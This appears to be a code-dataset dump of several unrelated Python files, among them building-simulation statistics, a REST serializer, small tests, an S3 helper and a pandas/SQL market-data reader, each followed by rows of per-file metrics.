self.zn4PMV_mean = np.mean(self.zn4PMV)
self.zn4PMV_max = np.max(self.zn4PMV)
self.zn4PMV_min = np.min(self.zn4PMV)
'''PMV values for all zones'''
self.allPMV = np.asarray([[self.corePMV], [self.zn1PMV], [self.zn2PMV], [self.zn3PMV], [self.zn4PMV]])
self.allPMV_mean1 = np.mean(self.allPMV, 0)
self.allPMV_mean2 = np.mean(self.allPMV_mean1)
self.allPMV_max = np.amax(self.allPMV)
self.allPMV_min = np.amin(self.allPMV)
'''HVAC power demand (kW)'''
self.hvacPower = np.asarray(newEntry['Whole Building:Facility Total HVAC Electric Demand Power [W](Hourly)'],
dtype=np.float32)
self.hvacPower_ave = np.mean(self.hvacPower)
self.hvacPower_max = np.max(self.hvacPower)
'''Core Zone Cooling Setpoint (C)'''
self.coreCS = np.asarray(newEntry['CORE_ZN:Zone Thermostat Cooling Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.coreCS_mean = np.mean(self.coreCS)
self.coreCS_max = np.max(self.coreCS)
self.coreCS_min = np.min(self.coreCS)
'''Zone 1 Cooling Setpoint (C)'''
self.zn1CS = np.asarray(newEntry['PERIMETER_ZN_1:Zone Thermostat Cooling Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn1CS_mean = np.mean(self.zn1CS)
self.zn1CS_max = np.max(self.zn1CS)
self.zn1CS_min = np.min(self.zn1CS)
'''Zone 2 Cooling Setpoint (C)'''
self.zn2CS = np.asarray(newEntry['PERIMETER_ZN_2:Zone Thermostat Cooling Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn2CS_mean = np.mean(self.zn2CS)
self.zn2CS_max = np.max(self.zn2CS)
self.zn2CS_min = np.min(self.zn2CS)
'''Zone 3 Cooling Setpoint (C)'''
self.zn3CS = np.asarray(newEntry['PERIMETER_ZN_3:Zone Thermostat Cooling Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn3CS_mean = np.mean(self.zn3CS)
self.zn3CS_max = np.max(self.zn3CS)
self.zn3CS_min = np.min(self.zn3CS)
'''Zone 4 Cooling Setpoint (C)'''
self.zn4CS = np.asarray(newEntry['PERIMETER_ZN_4:Zone Thermostat Cooling Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn4CS_mean = np.mean(self.zn4CS)
self.zn4CS_max = np.max(self.zn4CS)
self.zn4CS_min = np.min(self.zn4CS)
'''All Zones Cooling Setpoint (C)'''
self.allCS = np.asarray([[self.coreCS], [self.zn1CS], [self.zn2CS], [self.zn3CS], [self.zn4CS]])
self.allCS_mean1 = np.mean(self.allCS, 1)
self.allCS_mean2 = np.mean(self.allCS_mean1)
self.allCS_max = np.max(self.allCS)
self.allCS_min = np.min(self.allCS)
'''Core Zone Heating Setpoint (C)'''
self.coreHS = np.asarray(newEntry['CORE_ZN:Zone Thermostat Heating Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.coreHS_mean = np.mean(self.coreHS)
self.coreHS_max = np.max(self.coreHS)
self.coreHS_min = np.min(self.coreHS)
'''Zone 1 Heating Setpoint (C)'''
self.zn1HS = np.asarray(newEntry['PERIMETER_ZN_1:Zone Thermostat Heating Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn1HS_mean = np.mean(self.zn1HS)
self.zn1HS_max = np.max(self.zn1HS)
self.zn1HS_min = np.min(self.zn1HS)
'''Zone 2 Heating Setpoint (C)'''
self.zn2HS = np.asarray(newEntry['PERIMETER_ZN_2:Zone Thermostat Heating Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn2HS_mean = np.mean(self.zn2HS)
self.zn2HS_max = np.max(self.zn2HS)
self.zn2HS_min = np.min(self.zn2HS)
'''Zone 3 Heating Setpoint (C)'''
self.zn3HS = np.asarray(newEntry['PERIMETER_ZN_3:Zone Thermostat Heating Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn3HS_mean = np.mean(self.zn3HS)
self.zn3HS_max = np.max(self.zn3HS)
self.zn3HS_min = np.min(self.zn3HS)
'''Zone 4 Heating Setpoint (C)'''
self.zn4HS = np.asarray(newEntry['PERIMETER_ZN_4:Zone Thermostat Heating Setpoint Temperature [C](Hourly)'],
dtype=np.float32)
self.zn4HS_mean = np.mean(self.zn4HS)
self.zn4HS_max = np.max(self.zn4HS)
self.zn4HS_min = np.min(self.zn4HS)
'''All Zones Heating Setpoint (C)'''
self.allHS = np.asarray([[self.coreHS], [self.zn1HS], [self.zn2HS], [self.zn3HS], [self.zn4HS]])
self.allHS_mean1 = np.mean(self.allHS, 1)
self.allHS_mean2 = np.mean(self.allHS_mean1)
self.allHS_max = np.max(self.allHS)
self.allHS_min = np.min(self.allHS)
'''Core Zone Thermostat Temperature (C)'''
self.coreT = np.asarray(newEntry['CORE_ZN:Zone Thermostat Air Temperature [C](Hourly)'],
dtype=np.float32)
self.coreT_mean = np.mean(self.coreT)
self.coreT_max = np.max(self.coreT)
self.coreT_min = np.min(self.coreT)
'''Zone 1 Thermostat Temperature (C)'''
self.zn1T = np.asarray(newEntry['PERIMETER_ZN_1:Zone Thermostat Air Temperature [C](Hourly)'],
dtype=np.float32)
self.zn1T_mean = np.mean(self.zn1T)
self.zn1T_max = np.max(self.zn1T)
self.zn1T_min = np.min(self.zn1T)
'''Zone 2 Thermostat Temperature (C)'''
self.zn2T = np.asarray(newEntry['PERIMETER_ZN_2:Zone Thermostat Air Temperature [C](Hourly)'],
dtype=np.float32)
self.zn2T_mean = np.mean(self.zn2T)
self.zn2T_max = np.max(self.zn2T)
self.zn2T_min = np.min(self.zn2T)
'''Zone 3 Thermostat Temperature (C)'''
self.zn3T = np.asarray(newEntry['PERIMETER_ZN_3:Zone Thermostat Air Temperature [C](Hourly)'],
dtype=np.float32)
self.zn3T_mean = np.mean(self.zn3T)
self.zn3T_max = np.max(self.zn3T)
self.zn3T_min = np.min(self.zn3T)
'''Zone 4 Thermostat Temperature (C)'''
self.zn4T = np.asarray(newEntry['PERIMETER_ZN_4:Zone Thermostat Air Temperature [C](Hourly)'],
dtype=np.float32)
self.zn4T_mean = np.mean(self.zn4T)
self.zn4T_max = np.max(self.zn4T)
self.zn4T_min = np.min(self.zn4T)
'''All Zones Thermostat Temperature (C)'''
self.allT = np.asarray([[self.coreT], [self.zn1T], [self.zn2T], [self.zn3T], [self.zn4T]])
self.allT_mean1 = np.mean(self.allT, 1)
self.allT_mean2 = np.mean(self.allT_mean1)
self.allT_max = np.max(self.allT)
self.allT_min = np.min(self.allT)
| 60.48011 | 154 | 0.605693 | 5,520 | 44,090 | 4.669565 | 0.086957 | 0.058038 | 0.094972 | 0.094972 | 0.752211 | 0.75128 | 0.743327 | 0.73615 | 0.713726 | 0.669111 | 0 | 0.061077 | 0.266591 | 44,090 | 728 | 155 | 60.563187 | 0.735867 | 0.028238 | 0 | 0.306773 | 0 | 0 | 0.310408 | 0.196333 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.01992 | null | null | 0.027888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee79b1cea42968ae6299c692568e7413559fa013 | 60 | py | Python | src/models/__init__.py | cedricfarinazzo/ichronos.py | ae39dfce7e3e9b1b213e019e726da1145b604ae0 | [
"MIT"
] | null | null | null | src/models/__init__.py | cedricfarinazzo/ichronos.py | ae39dfce7e3e9b1b213e019e726da1145b604ae0 | [
"MIT"
] | null | null | null | src/models/__init__.py | cedricfarinazzo/ichronos.py | ae39dfce7e3e9b1b213e019e726da1145b604ae0 | [
"MIT"
] | null | null | null | from .week import *
from .day import *
from .lesson import * | 20 | 21 | 0.716667 | 9 | 60 | 4.777778 | 0.555556 | 0.465116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183333 | 60 | 3 | 21 | 20 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee79e278f84bbb1aa002b4b1c0de07c67f094969 | 232 | py | Python | RandomQueryProcessing/UseCaseApp/serializers.py | harshitmohanpandey/RandomQueryProcessing | 4e7e381a48a0a0eed2036b0db8dd889f16d8d81e | [
"MIT"
] | null | null | null | RandomQueryProcessing/UseCaseApp/serializers.py | harshitmohanpandey/RandomQueryProcessing | 4e7e381a48a0a0eed2036b0db8dd889f16d8d81e | [
"MIT"
] | 7 | 2020-06-05T23:50:29.000Z | 2022-02-10T10:23:18.000Z | RandomQueryProcessing/UseCaseApp/serializers.py | harshitmohanpandey/RandomQueryProcessing | 4e7e381a48a0a0eed2036b0db8dd889f16d8d81e | [
"MIT"
] | null | null | null | from rest_framework import serializers
class UseCaseData(serializers.Serializer):
date = serializers.CharField()
group_by_columns = serializers.CharField(max_length=200)
sortorder = serializers.CharField(max_length=200) | 38.666667 | 60 | 0.806034 | 26 | 232 | 7 | 0.653846 | 0.32967 | 0.252747 | 0.318681 | 0.351648 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029268 | 0.116379 | 232 | 6 | 61 | 38.666667 | 0.858537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
ee800cae83af2df821c5e36f7d04627c9023cd4d | 94 | py | Python | applications/MeshMovingApplication/trilinos_extension/TrilinosExtension.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/MeshMovingApplication/trilinos_extension/TrilinosExtension.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/MeshMovingApplication/trilinos_extension/TrilinosExtension.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | import KratosMultiphysics.TrilinosApplication
from KratosMeshMovingTrilinosExtension import *
| 31.333333 | 47 | 0.914894 | 6 | 94 | 14.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 94 | 2 | 48 | 47 | 0.977273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a006b59688e84e249ebfa27a40b1729d80f9886e | 190 | py | Python | samplePKG/tests/test_module1.py | matthewkirby/sampleCodeRepo | 475ac7e5e8dc9af404a5b2e988c43f03b2d3f624 | [
"MIT"
] | null | null | null | samplePKG/tests/test_module1.py | matthewkirby/sampleCodeRepo | 475ac7e5e8dc9af404a5b2e988c43f03b2d3f624 | [
"MIT"
] | null | null | null | samplePKG/tests/test_module1.py | matthewkirby/sampleCodeRepo | 475ac7e5e8dc9af404a5b2e988c43f03b2d3f624 | [
"MIT"
] | null | null | null | import samplePKG as s
def testAdd():
assert s.myAdd(1,2)==3
assert s.myAdd(5,6)==11
def testSub():
assert s.mySub(2,1)==1
assert s.mySub(1,2)==1
assert s.mySub(2,2)==0
| 17.272727 | 27 | 0.6 | 38 | 190 | 3 | 0.447368 | 0.307018 | 0.315789 | 0.22807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 0.210526 | 190 | 10 | 28 | 19 | 0.653333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.625 | 1 | 0.25 | true | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4e6107ea70f34d617c6ce4ac64935c2eede292a2 | 34 | py | Python | xdrawio/features/__init__.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | null | null | null | xdrawio/features/__init__.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | 1 | 2020-05-29T08:41:23.000Z | 2020-05-29T08:41:23.000Z | xdrawio/features/__init__.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | null | null | null | from .dataloader import read_data
| 17 | 33 | 0.852941 | 5 | 34 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4e907a20cd11b6befc9da949df92c6cd7fafa8f5 | 30 | py | Python | m3_light/data/__init__.py | matteocereda/RNAmotifs | dc1498e867e84ed19322920d7b0299939fa613b5 | [
"MIT"
] | 7 | 2016-03-11T13:53:34.000Z | 2021-04-11T14:58:04.000Z | m3_light/data/__init__.py | matteocereda/RNAmotifs | dc1498e867e84ed19322920d7b0299939fa613b5 | [
"MIT"
] | 1 | 2018-09-30T07:28:59.000Z | 2018-10-23T07:06:38.000Z | m3_light/data/__init__.py | matteocereda/RNAmotifs | dc1498e867e84ed19322920d7b0299939fa613b5 | [
"MIT"
] | 3 | 2016-12-16T07:49:25.000Z | 2020-04-07T05:35:01.000Z | # modules
from Fasta import *
| 10 | 19 | 0.733333 | 4 | 30 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 30 | 2 | 20 | 15 | 0.916667 | 0.233333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4e9cfc825ed5c6c7758bccd4c69826a0b208ff51 | 178 | py | Python | cakechat/utils/s3/utils.py | 4R7I5T/cakechat | 12060d50ee68ad59bc1b8efc247ed2d7dcc5fde7 | [
"Apache-2.0"
] | 1 | 2020-03-20T18:38:47.000Z | 2020-03-20T18:38:47.000Z | cakechat/utils/s3/utils.py | 4R7I5T/cakechat | 12060d50ee68ad59bc1b8efc247ed2d7dcc5fde7 | [
"Apache-2.0"
] | 64 | 2019-07-05T06:06:43.000Z | 2021-08-02T05:22:31.000Z | cakechat/utils/s3/utils.py | Spark3757/chatbot | 4e8eae70af2d5b68564d86b7ea0dbec956ae676f | [
"Apache-2.0"
] | 1 | 2018-10-14T04:14:41.000Z | 2018-10-14T04:14:41.000Z | import boto3
from botocore import UNSIGNED
from botocore.client import Config
def get_s3_resource():
return boto3.resource('s3', config=Config(signature_version=UNSIGNED))
| 22.25 | 74 | 0.803371 | 24 | 178 | 5.833333 | 0.583333 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025478 | 0.117978 | 178 | 7 | 75 | 25.428571 | 0.866242 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.6 | 0.2 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
4e9ff151658ebae7977d351c4aee9774c28d61a5 | 56 | py | Python | dew/__main__.py | jackoalan/dew | 22295c426e54e1289092eb5ca0eef9357f84e596 | [
"Apache-2.0"
] | 3 | 2017-08-20T20:39:16.000Z | 2019-05-14T00:28:39.000Z | dew/__main__.py | jackoalan/dew | 22295c426e54e1289092eb5ca0eef9357f84e596 | [
"Apache-2.0"
] | 6 | 2019-05-12T04:09:34.000Z | 2019-11-29T20:59:58.000Z | dew/__main__.py | jackoalan/dew | 22295c426e54e1289092eb5ca0eef9357f84e596 | [
"Apache-2.0"
] | 3 | 2019-02-09T17:16:32.000Z | 2020-03-25T16:25:58.000Z | from dew.cli import main_with_exit
main_with_exit()
| 14 | 35 | 0.785714 | 10 | 56 | 4 | 0.7 | 0.4 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160714 | 56 | 3 | 36 | 18.666667 | 0.851064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ee9c9ffba9a51d7f0176d3ec85c5e57bfc0069bf | 81 | py | Python | py_tdlib/constructors/page_block_horizontal_alignment_left.py | Mr-TelegramBot/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 24 | 2018-10-05T13:04:30.000Z | 2020-05-12T08:45:34.000Z | py_tdlib/constructors/page_block_horizontal_alignment_left.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 3 | 2019-06-26T07:20:20.000Z | 2021-05-24T13:06:56.000Z | py_tdlib/constructors/page_block_horizontal_alignment_left.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 5 | 2018-10-05T14:29:28.000Z | 2020-08-11T15:04:10.000Z | from ..factory import Type
class pageBlockHorizontalAlignmentLeft(Type):
pass
| 13.5 | 45 | 0.814815 | 8 | 81 | 8.25 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123457 | 81 | 5 | 46 | 16.2 | 0.929577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
ee9d5cc73373055728e3af50413486bf554326b6 | 88 | py | Python | rasa/nlu/classifiers/classifier.py | praneethgb/rasa | 5bf227f165d0b041a367d2c0bbf712ebb6a54792 | [
"Apache-2.0"
] | 37 | 2019-06-07T07:39:00.000Z | 2022-01-27T08:32:57.000Z | rasa/nlu/classifiers/classifier.py | alfredfrancis/rasa | d8d226408f20cc2563c3aefbccef3e364a447666 | [
"Apache-2.0"
] | 216 | 2020-09-20T13:05:58.000Z | 2022-03-28T12:10:24.000Z | rasa/nlu/classifiers/classifier.py | alfredfrancis/rasa | d8d226408f20cc2563c3aefbccef3e364a447666 | [
"Apache-2.0"
] | 65 | 2019-05-21T12:16:53.000Z | 2022-02-23T10:54:15.000Z | from rasa.nlu.components import Component
class IntentClassifier(Component):
pass
| 14.666667 | 41 | 0.795455 | 10 | 88 | 7 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147727 | 88 | 5 | 42 | 17.6 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
011f294612d4343d2439bb94ef5aaf3d5941beda | 6,782 | py | Python | dfdata/read_data.py | Eric2827/DFdata | 4db142232fc7127da3faae7c608772c72005cd25 | [
"MIT"
] | null | null | null | dfdata/read_data.py | Eric2827/DFdata | 4db142232fc7127da3faae7c608772c72005cd25 | [
"MIT"
] | null | null | null | dfdata/read_data.py | Eric2827/DFdata | 4db142232fc7127da3faae7c608772c72005cd25 | [
"MIT"
] | null | null | null |
import pandas as pd
from dfdata.util.log import Log
from dfdata.util.config import KeyWords
from dfdata.util import db_tool
from dfdata.util.func_tool import func_time
def return_function_read_date_table(data_kind, data_func_name):
"""
闭包,返回读取数据库函数
参数:
data_kind (str):数据种类,如'futures'
data_func_name (str) : 数据表名称,如'futures_date'
示例:
read_futures_date = return_function_read_date_table(data_kind='futures', data_func_name='futures_date')
read_futures_date为一个函数,执行该函数里的read_date_table函数。
"""
@func_time
def read_date_table(source, **keywords):
"""
从数据库读取数据
Parameters:
# 通用参数
source (str): 数据源名称
db (str) : 数据库名称
table (str) : 数据表名称
log (str) : log等级,如info, debug等,默认normal,
sql (str) : sql语句,如果sql有输入,只支持该查询语句。
fields (str or tuple) : 显示字段
limit (int or tuple) : 读取数量,如5, (5, 80)
# 不固定参数
start_date (str or int or datetime) : 开始时间
code : 代码
"""
#输入参数和默认参数
my_keywords = KeyWords(keywords, source_kind=source, data_kind=data_kind, data_func_name=data_func_name, function_kind='read')
db = my_keywords["db"]
table = my_keywords["table"]
today_str = my_keywords['today']
log_level = my_keywords['log']
log = Log(log_level) #初始化log等级
#函数查询, 默认参数
start_date_input = my_keywords['start_date']
end_date_input = my_keywords['end_date']
code = my_keywords['code']
fields = my_keywords['fields']
is_open = my_keywords['is_open']
exchange = my_keywords['exchange']
trade_date = my_keywords['trade_date']
limit = my_keywords['limit']
sql = my_keywords['sql']
#打印参数
log.standard('info', db=db, table=table, today=today_str, log_level=log_level)
conn = db_tool.connection_from_db_name(db)
if log_level in ['info', 'debug']:
db_tool.db_info(db, table=table, log_level=log_level)
#日期表生成sql语句
log.debug("日期表生成sql语句")
if exchange != None: #如果交易所参数有输入则只显示该列
fields='trade_date, '+ exchange
filter_is_open = db_tool.sql_filter(exchange, '=', is_open)
filter_start_end_date_str = db_tool.sql_filter_start_end_date('trade_date', start_date_input, end_date_input)
where = db_tool.sql_where(filter_start_end_date_str, filter_is_open)
search_sql = db_tool.get_sql(sql=sql, fields=fields, table=table, where=where, limit=limit, log_level=log_level)
log.debug("sql:" + search_sql)
df = pd.read_sql_query(search_sql, conn)
#关闭连接,返回结果
conn.close()
return df
#返回函数read_date_table
return read_date_table
def return_function_read_normal_table(data_kind, data_func_name):
"""
闭包,返回读取数据库函数
参数:
data_kind (str):数据种类,如'futures'
data_func_name (str) : 数据表名称,如'futures_date'
示例:
read_futures_basic = return_function_read_normal_table(data_kind='futures', data_func_name='futures_date')
read_futures_basic为一个函数,执行该函数里的read_normal_table函数。
"""
@func_time
def read_normal_table(source, **keywords):
"""
从数据库读取数据
Parameters:
# 通用参数
source (str): 数据源名称
db (str) : 数据库名称
table (str) : 数据表名称
log (str) : log等级,如info, debug等,默认normal,
sql (str) : sql语句,如果sql有输入,只支持该查询语句。
fields (str or tuple) : 显示字段
limit (int or tuple) : 读取数量,如5, (5, 80)
# 不固定参数
start_date (str or int or datetime) : 开始时间
code : 代码
"""
#输入参数和默认参数
my_keywords = KeyWords(keywords, source_kind=source, data_kind=data_kind, data_func_name=data_func_name, function_kind='read')
db = my_keywords["db"]
table = my_keywords["table"]
today_str = my_keywords['today']
log_level = my_keywords['log']
log = Log(log_level) #初始化log等级
#函数查询, 默认参数
start_date_input = my_keywords['start_date']
end_date_input = my_keywords['end_date']
code = my_keywords['code']
fields = my_keywords['fields']
is_open = my_keywords['is_open']
exchange = my_keywords['exchange']
trade_date = my_keywords['trade_date']
limit = my_keywords['limit']
sql = my_keywords['sql']
#打印参数
log.standard('info', db=db, table=table, today=today_str, log_level=log_level)
conn = db_tool.connection_from_db_name(db)
if log_level in ['info', 'debug']:
db_tool.db_info(db, table=table, log_level=log_level)
log.debug("其他表生成生成sql语句")
#生成where语句
filter_normal = db_tool.sql_filters(operator='=', code=code, exchange=exchange, trade_date=trade_date)
filter_start_end_date_str = db_tool.sql_filter_start_end_date('trade_date', start_date_input, end_date_input)
where = db_tool.sql_where(filter_normal, filter_start_end_date_str)
#生成sql语句,如果有输入sql参数,sql语句就为输入语句。否则按fields,table,where,limit四部分生成。
search_sql = db_tool.get_sql(sql=sql, fields=fields, table=table, where=where, limit=limit, log_level=log_level)
log.debug("sql:" + search_sql)
df = pd.read_sql_query(search_sql, conn)
#关闭连接,返回结果
conn.close()
return df
#返回函数read_normal_table
return read_normal_table
################################################################################
### 期货函数 futures
################################################################################
#函数,本地读取期货日期表
read_futures_date = return_function_read_date_table(data_kind='futures', data_func_name='futures_date')
#读取期货合约表函数
read_futures_basic = return_function_read_normal_table(data_kind='futures', data_func_name='futures_basic')
#读取期货日线表函数 futures_daily
read_futures_daily = return_function_read_normal_table(data_kind='futures', data_func_name='futures_daily')
#读取期货日线表函数 futures_daily
read_futures_min = return_function_read_normal_table(data_kind='futures', data_func_name='futures_min')
################################################################################
### 股票函数 stock
################################################################################
read_stock_date = return_function_read_date_table(data_kind='stock', data_func_name='stock_date')
read_stock_basic = return_function_read_normal_table(data_kind='stock', data_func_name='stock_basic')
read_stock_daily = return_function_read_normal_table(data_kind='stock', data_func_name='stock_daily')
| 32.763285 | 134 | 0.615895 | 836 | 6,782 | 4.629187 | 0.143541 | 0.072351 | 0.052713 | 0.039276 | 0.829974 | 0.792765 | 0.790698 | 0.778811 | 0.759173 | 0.759173 | 0 | 0.001555 | 0.241374 | 6,782 | 206 | 135 | 32.92233 | 0.750632 | 0.224418 | 0 | 0.666667 | 0 | 0 | 0.082397 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.064103 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0147ed8bf23bf5427741de9a83c7fbc9fbe19922 | 34 | py | Python | processor/__init__.py | nguyenphan99/test | 75429497b0ca8b802803dd1518d0dc25a7fd4008 | [
"MIT"
] | null | null | null | processor/__init__.py | nguyenphan99/test | 75429497b0ca8b802803dd1518d0dc25a7fd4008 | [
"MIT"
] | null | null | null | processor/__init__.py | nguyenphan99/test | 75429497b0ca8b802803dd1518d0dc25a7fd4008 | [
"MIT"
] | null | null | null | from .processor import train_model | 34 | 34 | 0.882353 | 5 | 34 | 5.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
